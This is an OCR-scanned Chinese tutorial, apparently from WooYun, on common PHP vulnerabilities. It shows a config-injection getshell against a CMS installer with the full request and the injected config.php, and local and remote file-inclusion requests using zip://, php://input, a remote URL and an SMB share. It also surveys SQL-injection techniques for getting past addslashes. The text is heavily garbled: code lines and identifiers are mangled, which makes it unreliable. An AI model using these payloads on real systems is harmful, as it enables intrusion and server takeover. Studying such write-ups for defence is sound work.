create_config($db_hosti, $db_user, $db_pwd, $db_name, $db_pref: 
} 
$query = mysql query("insert into ".$db prefix."users(login, pa: 
$insert id = mysql insert id(); 


$query = mysql query("insert into ".$db prefix."user extends(t« 











我 所 利用 的 是 这 个 。 用 似 可 以 直接 添加 一 个 管理 。 但 是 不 甘心 , 看 看 能 不 能 直接 
Getshell ° 


$link = mysql connect($db host,$db user,$db pwd); 
if (!$link) { 
echo '1001'; 
exit; 
j 
$r = mysql select db($db name,$1link); 
if(!$r){ 
echo '1002'; 


exit; 


首先 看 这 里 。 要 检测 mysql 是 否 能 够 连接 得 上 , 并 且 $db_name 得 存在 这 个 mysdq| 
中 。 
$ a = ParamHolder::get(" a",""); 
$ m - ParamHolder::get(" m","frontpage"); 
$db hosti - ParamHolder::get("db host",""); 
$db user = ParamHolder::get("db user", ""); 
$db pwd - ParamHolder::get("db pwd",""); 
$db name - ParamHolder::get("db name",""); 
$db prefix - ParamHolder::get("db prefix",""); 
$db port - ParamHolder::get("db port",""); 
$admin name = ParamHolder::get("admin name",""); 
$admin pwd = ParamHolder::get("admin pwd",""); 
$demo = ParamHolder::get("demo", ""); 


$db host = $db hosti.":".$db port; 


可 以 看 到 哪些 参数 都 是 可 控 的 。 
我 们 自己 搭建 一 个 mysql 可 外 联 就 行 了 。 


$pattern db = '/[0-9a-ZA-Z]*$/'; 


if(!preg_match($pattern_db, $db_name)||!preg_match($pattern_db, $dt 


echo '1001';exit; 





匹配 出 除开 0-9 a-z A-Z 以 外 的 就 退出 。 


$passwd = shai($admin_pwd); 
$tme = time(); 


if ($link) { 


create_config($db_hosti, $db_user, $db_pwd, $db_name, $db_pref: 





function 
$str 


$str 


$str. 


$str. 


$str 
$str 
$str 
$str 
$str 
$str 
$str 
$str 
$str 
$str 


$str 


file_ 
E | B 


可 以 看 到 直接 写 到 一 个 php 文 件 里 了 。 这 时 候 好 像 一 切 都 ok 了 。 


create_config(S$host, $user, $pwd, $dnname, $pre, $port) { 

.= "<?php Mn"; 

="if (!defined('IN CONTEXT')) die('access violation error 
-"class Config {\n"; 


.= "public static \$mysql_ext = 'mysql';\n"; 


.= "public static \$db_host '$host';\n"; 


.= "public static \$db_user '$user';\n"; 


.= "public static \$db_pass '$pwd';\n"; 


,= "public static \$db_name '$dnname';\n"; 

.= "public static \$port = '$port';\n"; 

.= "public static \$mysqli_charset = 'utf8';\n"; 

,= "public static \$tbl_prefix = '$pre';\n"; 

.= "public static \$cookie_prefix = '".randomStr(6)."_';\t 
.= "public static \$enable_db_debug = false;\n"; 


UNE 


put contents("../config.php",$str); 





可 是 一 切 又 没有 那么 的 容 匈 。 


x Load URL 
Ü ^ Splt URL 


(^ Execute | 


http://127.0.0.1/sitestar/install'index.php? mefrontpage& a-createadmin&xx-' 


[E] Enable Post data [E] Enable Referrer 


access violation error! 


www.wooyun.org 


access violation error! 
是 不 能 含有 单 引 号 的 。 但 是 在 这 里 关键 的 是 他 没有 过 滤 转 义 符 。。 
然后 就 进入 了 无 尽 的 测试 当中 。。 


function create config($host,S$user,$pwd,S$dnname,$pre,$port)([ 
$str - ""; 
$str .= "<?php \n"; 
$str.="if (!defined('IN CONTEXT')) die('access violation error 


$str.-"class Config {\n"; 


$str .= "public static N$mysql ext = 'mysql';\n"; 
$str .= "public static N$db host = '$host';\n"; 

$str .= "public static \$db user = '$user'; Mn"; 

$str .= "public static N$db pass = '$pwd';\n"; 

$str .= "public static N$db name = '$dnname';\n"; 
$str .= "public static \$port = '$port';\n"; 

$str .= "public static \$mysqli_charset = 'utf8';\n"; 
$str .= "public static NM$tbl prefix = '$pre';\n"; 
$str .= "public static M$cookie prefix = '".randomStr(6)." ';Wr 
$str .= "public static N$enable db debug = false;\n"; 
$str .= "}?>\n"; 


file put contents("../config.php",$str); 
Ln ——  AÁ— ——Á———À 


看 这 个 理论 上 来 说 只 





$str .= "public static \$mysqli_charset = 'utf8';\n"; 


$str .= "public static \$cookie_prefix = '".randomStr(6)." ';Wr 





$str .= "public static \$db_host = '$host';\n"; 


$str .= "public static \$db_user = '$user';\n"; 
$str .= "public static \$db_pass = '$pwd';\n"; 
$str .= "public static \$db_name = '$dnname';\n"; 


这 四 个 会 用 来 连接 如 果 连 接 不 上 的 话 就 退出 了 。 就 算 不 上 能 随意 控制 。 


$str .= "public static \$port = '$port';\n"; 
$str .= "public static \$mysqli_charset = 'utf8';\n"; 
$str .= "public static \$tbl_prefix = '$pre';\n"; 


就 剩 下 了 这 两 个 可 控 。 但 是 中 间 还 有 了 个 不 可 控 的 。 
如 果 两 个 可 控 的 挨 在 一 起 的 话 可 以 这 样 

public static $port = '\'; 

public static $tbl prefix = ';phpinfo();/*; 

但 是 由 于 中 间 多 了 一 个 不 可 控 的 所 以 不 能 直接 这 样 。。 
如 果 可 控 的 两 行 没 挨 在 一 起 的 话 

那么 可 控 的 必须 要 三 行 了 才能 执行 了 。。 那 怎 么 办 呢 ? 
DB HOST 肯定 是 不 能 改 的 要 不 就 连 不 上 了 。 

那 就 要 从 DB NAME db user 和 db pwd 下 手 了 。 


$pattern db = '/[0-9a-zA-Z]*$/'; 
if(!preg_match($pattern_db, $db_name)||!preg_match($pattern_db, $dt 


echo '1001';exit; 


i 局 
这 里 的 正则 验证 了 db name 和 db user 但 是 这 中 间 连 接 的 是 一 个 or 。 

那 只 要 让 一 个 匹配 不 出 除开 09 az AZ 以 外 的 就 行 了 。 

那 就 让 db_name 匹 配 不 出 因为 我 测试 了 db_name 在 我 创建 数据 库 的 时 候 无 法 添加 


ke o 


符号 的 。 





论 PHP 常见 漏洞 


这 样 只 有 从 db_user 和 db_pwd 下 手 了 。 

在 本 地 的 mysql 里 建 一 个 含有 特殊 字符 的 账户 和 密码 。 
[email protected]\ #43 7j ;/* 

这 样 类 似 的 就 行 了 。 

来 测试 测试 。 


漏洞 证 明 








mysql> grant select,update,delete,insert on *.* to "yu\\" identified by [X 
d dal 
Query OK, 0 rows affected 


mysqi» | 
www.wooyun.or 


首先 建立 一 个 账户 。 要 记得 对 一 些 字符 转 义 。 
然后 访问 


INT 7| = ẹ SQL- XSS- Encryption Encodingy Other- 





4m) Load URL |http://127.0.0.1/sitestar/install/index.php?_m=frontpage&_a=createadmin&admin_name=xiaoyux&passwd=xiaoyux&db_host=113.10, 
Q split URL 


db_name=test&db_port=test&db_prefx=*/}phpinfo();/*&db_pwd=;/*| 








[E] Enable Post data [J Enable Referrer 





WWW.Wooyun.org 


来 看 看 配置 文件 。 





2 if (!defined('IN CONTEXT')) die('access violation error!' 
3 class Config {i 
4 public static $mysql ext = 'pnmysgài': 
5 public static $db host = '113.10 Re; 
6 public static $db user = 'yy\'; 
7 public static $db pass = ';/*'; 
8 public static $db name = 'test'; 
9 public static Sport = 'test'; 
10 public static $mysqli_charset = 'ucf8'; 
ala public static $tbl_ prefix = '*/}phpinfo();/*'; 
12 public static $cookie prefix = '48npj3 '; 
13 public static Senable db debug = false; 
14 )?» 9 
15 
www.wooyun.org 


直接 访问 首页 。 
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4 Load URL | http://127.0.0.1/sitestar/| 


») Execute 








[E] Enable Post data [E] Enable Referrer 








Windows NT 3VUL4I065FQUDIU 5.1 build 2600 


Build Date May 2 2008 18:01:20 


Configure cscript /nologo configure. js “--enable-snapshot 
Command *——with-extra-includes=C: \Program Files (x86) \W 
\MICROS~2\\VC98 \\ATL\ INCLUDE ; C: “PROGRA 2\MICROS < 
\WC98\MFC\ INCLUDE” “with extra libs<C: MProgrz 
\PROGRA ~2\MICROS 2NVCOBALIB, C. XPRQ 





成 功 getshell 。 
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0x02 包含 漏洞 


这 里 再 来 谈 一 下 包含 
其 实 包含 也 并 没有 什么 好 说 的 。 
包含 一 般 也 就 分 为 LFI RFI local file inclusion 和 remote i 


oe 话 因为 很 多 都 限制 了 包含 的 后 组 结尾 必须 为 ,php Include ($a.".php') 例如 
这 种 的 


所 以 我 们 想 包含 我 们 的 图 片 马 儿 的 话 那么 就 需要 截断 后 面 的 这 .php 
1: 00 截 断 需要 gpc off && php«5.3.4 2: 长 文件 名 截断 反正 这 个 我 很 少 成 功 。3: 转 
换 字 符 集 造 成 的 截断 这 个 对 包含 的 话 基本 用 不 上 。 上 传 的 话 就 是 felixk3y 牛 发 的 那 
个 转换 字符 集 造 成 的 上 传 截断 那个 。 
还 有 一 些 cms 限 制 包含 的 后 组 必须 为 ,php 的 时 候 用 的 是 截取 字符 判断 是 不 是 .php ffl 
如 下 面 一 段 简单 的 代码 

$include file-$ GET[include file]; 

if ( isset( S$include file ) && strtolower( substr( S$include file, 


require( $include file ); 


4] uu uu E 





对 传递 过 来 的 截取 了 后 面 4 个 字符 判断 是 不 是 .php 如 果 是 .php 才 进行 包含 。 
这 里 可 以 用 zip( 或 者 phar) 协 议 嘛 (当然 这 个 也 是 找 laterain 学 的 哈哈 ) » 

首先 新 建 一 个 1.php 里 面 随 便 写 个 phpinfo 把 

然后 压缩 成 .zip 然后 把 zip 的 名 字 改 成 yu.jpg 

然后 把 这 个 .jpg 上 传 上 去 然后 包含 


it PHP 常见 漏洞 





Load URL http: //web/test. php?include file-zip://D:/ApmServ/www/htdocs/yu. jpg¥231. php 








[C] Enable Post data [|] Enable Referrer 








[System [Windows NT SSGSRPLGRPJYWLK 5.1 build 2600 
Build Date May 2 2008 18:01:20 


Configure cscript /nologo configure. js "--enable-snapshot-build" "--with-gd-shared" 
Command “--with-extra-includes=C: \Program Files (x86)\Microsoft SDK\Include;C: 
XPROGRA"2AMICROS 2XVC9SXATLXAINCLUDE;C: XPROGRA"2AMICROS 2XVC98XINCLUDE:;C: 
XPROGRA"2AMICROS “2\VC9S\MFC\INCLUDE” “--with-extra-libs=C: \Program Files . . 
(x86) Microsoft SDKALib;C: PROGRA"ZWIICROS 2AVCSEALIB;C: VPROGRA 2WHICROS 2 dropswooyun'org 


对 于 一 些 LF| 找 不 到 上 传 图 片 的 地 方 的 话 也 有 很 多 牛 发 过 了 一 些 不 能 上 传 图 片 LFI 
的 技巧 各 种 包含 日 志 环境 变量 啥 的 这 里 我 就 也 不 多 说 了 。 


下 面 再 来 说 RFI 

如 果 能 RFI 的 话 那么 就 是 最 方便 的 了 。 

包含 远程 文件 或 者 又 是 php://input data 哈 的 各 种 伪 协 议 。 

但 是 也 都 知道 RFI 最 大 的 限制 条 件 就 是 需要 allow_url_include on 

且 变量 前 未 定义 路 径 或 者 常量 。 

Allow url include 默认 都 是 off 

那么 无 论 是 allow_url_include on 还 是 变量 前 无 路 径 或 者 常量 

那 都 是 rfi 的 硬 伤 。 

这 里 介绍 一 种 在 allow_url_include off 的 情况 下 也 能 rfi 的 

但 是 成 功率 也 并 不 太 高 。 

首先 在 php.ini 里 看 一 下 allow_url_include 
; Whether to allow include/require to open URLs (like http:// or fl 
allow url include - Off 

EE 

翻译 一 下 ,允许 包含 ur| 例如 http:// ftp:// 之 类 的 协议 。 

当 off 的 时 候 肯 定 就 是 不 允许 去 包含 这 样 的 协议 。 

这 里 我 们 先 来 测试 一 下 





<?php 
include($_GET[yu]); 
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it PHP 常见 漏洞 


首先 allow url include && allow_url_fopen 都 为 on 的 时 候 


4m Load URL web/?yuchttp: //web/1. jpg 
Ü Split URL 





>) Execute 





[C] Enable Post data [|] Enable Referrer 








Windows NT SSGSRPLGRPJYHLK 5.1 build 2600 


feild Date [ay 2 2006 16:01:20 


Configure cscript /nologo configure. js "--enable-snapshot-build" “--with-gd=dhapsavooyul.org, 





成 功 RFl。 


然后 allow url include 为 on allow_url_fopen A off 





qu) Load URL web/?yuchttp: //web/1. jpg 
Ü Split URL 








1 Execute 





[C Enable Post data [ Enable Referrer 





Warning: include() [function. include]: URL file-access is disabled in the server configuration in D:\ApmServ\swe\htdocs 
\index. php on line 2 


Warning: include(http://web/1. jpg) (function. include]: failed to open stream: no suitable wrapper could be found in 
D: \ApmServ\wwe\htdocs\index. php on line 2 


Warning: include() [function. include]: Failed opening 'http://web/l. jpg’ for inclusion (include_path=". ;C:\php5\pear’) in 


D: \ApmServ\wwe\htdocs\index. php on line 2 drops.wooyun.org 


直接 包含 远程 文件 失败 这 时 候 我 们 用 一 下 伪 协 议 试 试 。 





Load URL | web/?yu=php: //input 
Ü spit URL 
>) Execute 
Enable Post data  [ | Enable Referrer 
Post data 


<?php phpinfo ();?> 











再 次 成 功 rfi。 
当 allow_url_include && allow_url_fopen 为 off 的 时 候 。 
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it PHP 常见 漏洞 


4m] Load URL http: //web/?yu-php: //input 











Ü split URL 
>» Execute 

Enable Post data  [ | Enable Referrer 
Post data C php phpinfo ();?> 








Warning: include(php://input) [function.include]: failed to open stream: No error in D:' 
line 2 


Warning: include [function. include]: Failed opening 'php://input' for inclusion (inclu 
D:XApmServwwwYhtdocsXMindex. php on line 2 drops.wooyun.org 


AMMA ° 
包含 文件 


4m) Load URL http: //web/?yu=http: //web/1. jpal - 
Ü Split URL + 











JJ Execute 





[C] Enable Post data [] Enable Referrer 





Warning: include() [function. include]: URL file-access is disabled in the server configuration in D:\ApmServ\wwe\htdocs 
\index. php on line 2 


Warning: include(http://web/1l. jpg) [function. include]: failed to open stream: no suitable wrapper could be found in 
D: \ApmServ\wwe\htdocs\index. php on line 2 


Warning: include() [function. include]: Failed opening 'http://web/l. jpg’ for inclusion (include_path=".;C:\php5\pear’) in 


D: \ApmServ\wwe\htdocs\index. php on line 2 
drops.wooyun.org 


URL file-access is disabled in the server configuration 不 允许 包含 。 
肯定 还 有 不 少 人 记得 很 久 以 前 的 那个 星 外 无 可 执行 目录 的 时 候 
利用 远程 调用 cmd 继 续 提 权 
那个 利用 的 是 共享 文件 然后 在 星 外 主机 上 来 执行 。 
那么 这 里 我 们 也 试 试 

所 OC} web/2yu=\\192. 168. 199. TY php RY e| osa. 月 


B 访问 最 多 | | EasyTalk Administra: $ 90sec 信 息 安 全 小 姐 KJ Exploit-1P 漏 洞 公布 ;EasyTalk Administra 轩 1 


= @ SQL XSS- Encryption” Encodingy Other 











三 Load URL http: //web/?yu=\4192. 1858. 199. 15TXshare^index. php 
Ü Split URL 
+) Execute 





[C] Enable Post data [ | Enable Referrer 





Windows NT SSGSRPLGRPJYWLK 5.1 build 2600 





包含 共享 文件 成 功 。 这 里 只 本 地 测试 了 没 具 体 测 试 。 
但 是 由 于 445 的 原因 可 能 基本 都 失败 。 


0x03 2A 


下 面 来 说 一 下 注入 。 这 里 谈 的 是 mysql。 注入 大 概 也 就 是 把 用 户 可 控 的 一 些 变量 

带 入 到 了 数据 库 的 各 种 操作 当中 且 没 有 做 好 很 好 的 过 滤 。 比如 注册 用 户 的 时 候 检 测 
用 户 名 是 否 存在 的 时 候 ,把 用 户 提交 的 用 户 名 拿 到 数据 库 中 去 查询 。 查 询 是 否 存 在 

这 个 用 户 名 , 如 果 这 里 对 用 户 名 没有 做 好 过 滤 的 话 那么 用 户 就 可 以 提交 一 些 特殊 字 
符 来 注入 了 。 


现在 注入 的 主要 原因 是 很 多 程序 员 在 写 sql 语 名 的 时 候 还 是 摘 的 语句 拼接 。 
一 些 用 了 预 编译 或 者 是 在 查询 的 函数 中 再 来 过 滤 很 多 时 候 就 给 跪 了 。 


select update insert delete 


A mysql query 并 不 能 执行 多 行 语句 , 除非 pdo 哈 的 能 多 行 所 以 不 能 像 mssql 那 样 
还 能 在 select 后 执行 个 update 管 理 的 语 匈 。 


对 于 这 四 种 类 型 的 注入 一 般 的 语句 的 构造 也 不 同 。 
如 果 有 mysql error 的 话 

那么 这 四 种 就 都 能 用 报错 注入 这 种 是 比较 方便 的 
如 果 没 mysql error 的 话 


Select 的 注入 一 般 是 用 union select 如 果 把 对 数据 库 中 的 查询 2 告 果 展 示 出 来 的 话 那 
ee » 如 果 无 回 显 的 话 那么 当然 就 是 育 注 了 。 


Update 的 注入 如 果 是 在 update set 的 位 置 的 话 那么 我 们 可 以 找 找 这 个 表 的 哪个 
column 会 被 展示 出 来 例如 如 果 一 个 update 的 注入 点 是 在 用 户 表 且 是 在 Set 位置 可 控 
的 话 那么 我 们 可 以 update email 这 个 column 然后 去 用 户 资料 看 一 下 自己 的 email 就 
出 数据 了 语句 例如 update table set email=(select user()) 如 果 是 在 where 后 的 话 AB 
么 一 般 也 就 是 言 注 了 。 


Insert 的 注入 也 是 一 般 是 通过 找 哪个 column 会 不 会 显示 出 来 尽量 把 要 出 的 数据 插 
入 到 这 个 column 里 面 去 。 如 果 没 显示 的 话 也 是 育 注 。 


Delete 的 注入 一 般 都 是 盲 注 了 。 
数字 型 注入 主要 就 是 因为 他 的 变量 并 没有 用 单 引 号 引 住 。 
但 是 基本 上 都 是 被 强制 类 型 转换 了 intval 啥 的 。 
但 是 有 时 候 会 有 遗漏 的 嘛 。 
而 字符 型 和 搜索 型 的 都 是 会 有 单 引 号 引 住 的 。 


所 以 需要 闭合 单 引号 再 来 进行 注入 。 

说 到 单 引号 不 得 不 说 个 php.ini 里 的 配置 
Magic_quotes_gpc 在 稍微 高 点 的 版 本 默认 都 是 on 

但 是 却 在 应 该 是 5.4 就 已 经 废除 了 。 

从 字面 意思 上 来 看 就 是 对 GPC QUOTES 

GPC 对 应 的 就 是 GET POST COOKIE 

会 被 转 义 的 字符 为 '“\ NULL 会 在 前 面 添加 上 一 个 转 义 符 。 
导致 了 失去 本 来 的 意义 无 法 闭合 单 引 号 进行 注入 。 

(1) 全 局 没有 做 addslashes 的 


像 这 种 全 局 没有 对 GET POST COOKIE 做 addslashes 的 这 种 厂商 基本 是 会 在 查询 
的 时 候 再 对 一 些 用 户 可 控 的 变量 进行 addslashes 其 至 是 不 进行 addslashes 直接 带 
入 查询 的 。 


这 样 的 就 算 在 查询 的 时 候 进行 addslashes 在 很 多 时 候 也 都 能 找到 几 处 遗漏 了 
addslashes 的 。 这 种 的 比较 简单 不 多 说 。 


(2) 全 局 做 addslashes 


现在 稍微 好 一 点 的 厂商 都 知道 了 在 全 局 文件 中 对 GET POST COOKIE 做 
addslashes (甚至 是 在 带 入 查询 的 函数 中 再 做 了 转 义 或 者 预 编 译 SUR IB E) 所 以 基 
本 不 用 担心 哪里 遗漏 了 哪里 忘记 了 addslashes) 这 种 的 基本 是 首先 先 get magic 
quotes gpc 7I Hop Ge 如 果 没 开 尼 的 话 AAA addslashes Kik o 如 果 开 
局 的 话 就 不 用 来 addslashes 了 。 没 开局 就 addslashes. 


这 里 主要 讲 的 就 是 这 种 类 型 的 注入 的 一 些 常 见 的 


wF PEA 


这 个 是 一 个 老生 沉 谈 的 问题 , 从 一 开始 的 数据 库 字 符 集 GBK 的 宽 字 节 注 入 到 现在 也 
有 很 久 了 。 


但 是 并 不 是 字符 集 为 GBK 的 就 能 宽 字 节 注入 。 

总 有 一 些小 伙伴 说 咋 我 看 的 cms 字符 集 是 gbk 的 但 是 咋 不 能 宽 字 节 呢 ? 
这 是 因为 数据 库 的 连接 方式 不 同 

Set names gbk 2% ## 49 #6 fe 35 FOF 

但 是 现在 这 样 的 基本 都 看 不 到 了 。 因为 基本 都 是 设置 了 二 进 制 读 取 了 。 
Binary ° 


这 样 的 宽 字 节 基 本 没 了 , 却 有 了 另外 一 种 。 
为 转换 字符 集 造 成 的 宽 字 节 注入 
从 utf8 转 到 gbk 或 者 从 gbk 转 到 utf8 哈 的 。 
例子 : WooYun: 74cms 最 新 版 注入 8-9 


锦 从 UTF8 转 成 GBK 之 后 成 了 %e5%5c74cms 对 GET POST COOKIE ...... 都 做 了 
addslashes Pf VA' 44 SLUG AN\->%5C 96e5965c965c' 两 个 \ 则 单 引 号 出 来 


例子 2: WooYun: qibocms 下 载 系统 SQL 注入 一 枚 《官网 可 重 现 ) 


解码 导致 


为 在 全 局 文件 中 addslashes 

如 果 我 们 能 找到 一 些 解码 的 例如 urldecode base64_decode f? 
么 我 们 先 提交 encode 之 后 的 那么 就 能 不 被 转 义 了 。 

然后 decode 后 再 带 入 查询 造成 了 注入 无 视 gpc。 

这 种 的 很 常见 

例子 很 多 随便 找 一 个 

例子 : WooYun: qibocms B2b 注入 一 枚 /qibocms 注入 

例子 : WooYun: phpdisk V7 sql 注 入 2 //phpdisk 注入 


EERE 


常见 的 变量 覆盖 有 啥 extract fe parse. str 函数 啥 的 

当然 还 有 $$ 

变量 覆盖 得 结合 一 些 有 具体 的 场景 了 。 

例如 extract($_POST) 哈 的 直接 从 POST 数组 中 取出 变量 

这 样 的 还 是 遇 到 过 几 个 然后 覆盖 掉 之 前 的 一 些 变量 

覆盖 的 话 一 般 是 覆盖 掉 表 前 级 之 类 的 

Select * from $pre admin where xxx 像 这 种 的 就 覆盖 掉 $pre 
然后 直接 补 全 语句 然后 注入 。 


例子 : WooYun: qibocms 分 类 注入 一 枚 可 提升 自己 为 管理 
例子 2: WooYun: phpmps 注入 一 枚 
当然 $$ 也 挺 经 常用 到 的 这 个 例子 很 不 错 。 
例子 3: WooYun: MetInfo3x 3t (5.2.4) — 4: SQL 8 2-7 TF] 


一 些 replace 造 成 的 


一 些 cms 中 ŽA — 1538 Vot JE e de 

会 把 ' 啥 的 replace 成 空 

但 是 他 似乎 忘记 了 自己 全 局 有 转 义 ? 

用 户 提交 一 个 ' 全 局 转 义 成 \ 然后 这 过 滤 函 数 又 会 把 replace 成 空 
那么 就 留 下 了 \ 导致 可 以 吃 掉 一 个 单 引 号 是 double query 的 话 


Select * from c admin where username-'adminN' and email=’inject#’ 
一 = 
这 样 就 可 以 注入 了 。 
话说 之 前 还 遇 到 过 一 个 厂商 。。 之 前 提交 了 漏洞 是 因为 他 会 把 
'" 都 会 蔡 换 成 空 然后 提交 之 后 他 就 去 掉 了 ' 就 是 不 把 ' 替换 成 空 了 
但 是 他 似乎 忘记 了 " 也 会 被 转 义 。。 那么 提交 一 个 "就 又 剩 下 了 一 个 转 义 符 。 
例子 : WooYun: PHPCMS 全 版 本 通 杀 SQL 注入 漏洞 
当然 还 有 一 些 replace 是 用 户 可 控 的 。 就 是 说 用 户 可 以 想 把 啥 提交 成 空 就 提交 成 空 
例如 很 久 前 的 cmseasy 和 ecshop 的 那个 注入 
例如 这 段 代码 


$order_sn = str replace($ GET['subject'],'',$ GET['out trade no']), 
里 因为 会 被 转 义 如 果 提 交 ' 就 成 \ 这 里 可 以 看 到 

这 里 清 成 空 的 是 我 们 get 来 的 那 我 们 就 想 办 法 把 \ replaced? 

但 是 如 果 我 们 GET 提 交 把 \ replace 那么 会 被 转 义 就 是 replace 掉 \ 

但 是 我 们 只 是 \ 所 以 不 能 把 \ 去 掉 如 果 我 有 \ 还 要 你 清空 个 毛 啊 。 


这 里 我 们 来 理 清 一 下 思路 。 
Addslashes 会 对 '"\ NULL 转 义 
I 二 > NE 
" => NU 


Occ 
NULL => \O 


那 这 里 我 们 就 提交 %00' 就 会 被 转 义 生成 \OV 这 时 候 我 们 再 提交 把 0 替换 成 空 那么 
就 成 了 \ 单 引 号 也 就 成 功 出 来 了 。 


例子 : WooYun: cmseasy 绕 过 补丁 SQL 注入 一 枚 


SERVER 注入 


因为 在 很 多 cms 中 基本 上 都 只 是 对 GET POST COOKIE 3t 4raddslashes 
而 没有 对 SERVER 进行 转 义 。 
而 一 些 SERVER 的 变量 也 是 用 户 可 以 控制 的 。 


例如 哈 QUERY_STRING X FORWARDED FOR CLIENT IP HTTP HOST 
ACCEPT LANGUAGE 很 多 。 


这 里 最 常见 的 当然 也 就 是 X_FORWARDED_FOR 


aa | 如 果 后 面 没 有 进行 验证 ip 是 否 合法 的 话 就 直接 return 这 
部 分 时 候 都 会 导致 注入 ° 


例子 1: WooYun: Phpyun 注 入 漏洞 二 

这 里 说 到 验证 ip 这 里 基本 都 是 用 的 正则 来 验证 是 否 合法 。 

而 一 些 厂 商 连 正则 都 写 错 。 

例如 在 cmseasy 中 的 验证 ip 的 正则 中 (%.+) 

导致 了 后 面 可 以 写 任意 字符 。 

例子 2: WooYun: CmsEasy 最 新 版 本 无 限制 SQL 注射 

最 近 自 己 在 看 douphp 里 面 的 验证 ip 的 正则 自己 也 发 现 了 一 点 小 问题 。 
不 过 也 就 只 是 小 问题 而 已 。 
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us 


function get_ip() { 

static $ip; 

if (isset($ SERVER)) { 

if (isset($ SERVER["HTTP X FORWARDED FOR"])) { 
$ip = $ SERVER["HTTP X FORWARDED FOR"]; 

) else if (isset($ SERVER["HTTP CLIENT IP"])) 4 
$ip = $ SERVER["HTTP CLIENT IP"]; 

} else { 

$ip = $ SERVER["REMOTE ADDR"]; 


j 

} else { 

if (getenv("HTTP_X_FORWARDED_FOR")) { 

$ip = getenv("HTTP X FORWARDED FOR"); 

} else if (getenv( "HIP CLIENT TP")) { 
$ip = getenv("HTTP CLIENT IP"); 


) else { 
$ip - getenv("REMOTE ADDR"); 
} 


if (preg_match('/4(([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3. 
return $ip; 

) else { 

return '127.0.0.1'; 





来 看 看 验证 jp 是 否 合法 的 正则 


preg_match('/4(([1-9]?[0-9]|1[0-9]{2}|2[0-4] [0-9] |25[0-5]).){3}([1- 
E = = 
这 里 我 们 仔细 来 看 看 他 这 里 是 准备 匹配 小 数 点 但 是 他 直接 写成 了 . 


都 知道 在 正则 中 .表示 的 是 匹配 任意 字符 除开 换行 符 意外 但 是 在 开启 /s 修正 符 以 后 
换行 符 也 会 匹配 。 


不 过 他 这 个 .后 面 没 啥 + 或 者 ?的 导致 也 就 只 能 写 一 个 字符 。 
直接 写成 了 . 那 在 这 里 我 们 就 能 引入 单 引 号 了 。 不 过 也 就 一 个 字符 。 
这 里 的 正确 写法 应 该 是 . 





FILES 注 入 。 


也 差不多 也 是 因为 全 局 只 对 COOKIE GET POST 转 义 遗漏 了 FILES 且 不 受 gpc 。 
FILES 注入 一 般 是 因为 上 传 会 把 上 传 的 名 字 带 到 insert 当 中 入 库 。 

然后 这 里 文件 的 名 字 是 我 们 可 以 控制 的 所 以 导致 了 注入 。 

而 这 里 的 上 传 的 名 字 是 我 们 可 以 控制 的 。 

例子 : WooYun: qibocms 黄页 系统 SQL 注 入 一 枚 


还 有 一 些 在 入 库 的 时 候 才 对 文件 的 名 字 进 行 了 转 义 而 在 获取 后 组 后 在 入 库 的 时 候 
对 文件 名 转 义 了 却 没有 对 后 缓 转 义 也 导致 了 注入 


例子 : WooYun: Supesite 前 台 注 入 #2 (Insert) 


未 初始 化 造成 的 注入 


很 久 以 前 php<4.20 的 时 候 为 了 方便 register_globals 默认 都 是 on。 


而 到 了 后 面 register globals 的 次 端 也 显现 了 出 来 , 所 以 也 在 很 久 以 前 默认 都 是 off 


而 到 了 现在 , 很 多 cms 却 喜 欢 模 仿 register_globals 搞 起 了 伪 全 局 机 制 。 
例如 啥 qibocms metinfo destoon 啥 的 啊 。 

这 样 是 方便 了 不 少 , 但 是 如 果 哪 里 遗漏 了 初始 化 那么 就 会 导致 注入 了 。 
感觉 这 种 的 挺 好 玩 的 多 找 了 几 个 例子 。 

例子 : WooYun: qibocms 地 方 门户 系统 注入 一 个 问题 (demo 测 试 ) 

例子 : WooYun: qibocms 地 方 门户 系统 注入 (多 处 类 似 ,demo 测 试 ) 
例子 : WooYun: 齐 博 地 方 门户 系统 SQL 注入 漏洞 (无 需 登 录 可 批量 ) 
例子 : WooYun: 齐 博 整 站 /地 方 门户 SQL 注入 漏洞 


数组 中 的 key 。 


因为 在 对 全 局 转 义 的 时 候 

很 多 cms 都 只 是 判断 gpc 是 否 开局 

如 果 off 就 对 数组 中 的 value 就 行 addslashes 
却 忘记 了 对 数组 中 的 key 进 行 转 义 。 


那么 这 样 也 导致 了 一 个 问题 。 也 就 是 在 Gpc off 的 时 候 那 么 数组 的 key 没 有 被 过 滤 导 
致 可 以 引入 单 引 号 。( 听 说 低 版 本 的 php 对 二 维 数组 中 的 key 就 算 gpc on 也 不 会 转 义 ) 


如 果 哪里 把 数组 中 的 key 读 取 出 来 然后 把 key 带 入 到 了 查询 当中 
那么 也 会 造成 安全 问题 。 


而 且 这 样 的 例子 很 多 。 简直 惨不忍睹 。 例子 : WooYun: qibocms V7 整 站 系统 最 新 
版 SQL 注入 一 枚 & 另外 一 处 能 引入 转 义 符 的 地 方 。// 数 组 key 的 注入 例子 : WooYun: 
qibocms 多 个 系统 绕 过 补丁 继续 注入 2 


例子 : WooYun: qibocms 全 部 开源 系统 Getshell 
例子 : WooYun: Discuz 5.x 6.x 7.x 前 人 台 SQL 注 入 漏洞 一 枚 


offset 


这 种 算是 比较 常见 的 一 种 注入 的 。 
代码 大 概 如 

<?php 

$key=0; 

$a=$_GET[a] [$key]; 


$b=$_GET[b]; 
Mysql_query("select * from table where xxx='$a' and xx='$b'") 


如 果 这 里 $ GET[a] 提交 的 是 一 个 数组 且 含有 一 个 key 为 0 的 那么 $a 就 是 对 应 的 这 个 
key 的 value 


但 是 这 里 并 没有 强制 要 求 为 数组 。 

那么 我 们 提交 一 个 字符 串 那么 后 面 的 [0] 那么 就 是 截取 的 第 一 个 字符 
在 全 局 中 单 引 号 被 转 义 为 \ 截取 第 一 个 字符 就 为 了 \ 

吃 掉 一 个 单 引 号 然后 就 在 $b 处 写 入 inject 可 以 注入 了 。 

例子 : WooYun: qibocms 地 方 门户 系统 注入 天 (demo 测 试 ) 

还 有 map 发 的 那 Disucz 7.2 的 那 注 入 也 一 样 。 


第 三 方 插件 


很 常见 的 一 种 洞 。 


比较 常见 的 uc 和 alipay tenpay chinabank 啥 的 

特别 是 uc 因为 默认 uc 里 面 都 会 striplashes 

Uc 的 话 一 般 会 遇 到 的 问题 是 uckey 默 认 的 。 

或 者 是 uckey 这 个 常量 根本 就 没有 初始 化 。 

导致 了 uckey 可 控 再 导致 了 Getshell 或 者 HAA o 

还 有 tenpay 和 alipay 啥 的 一 些 是 因为 忘记 把 过 滤 的 文件 包含 进来 

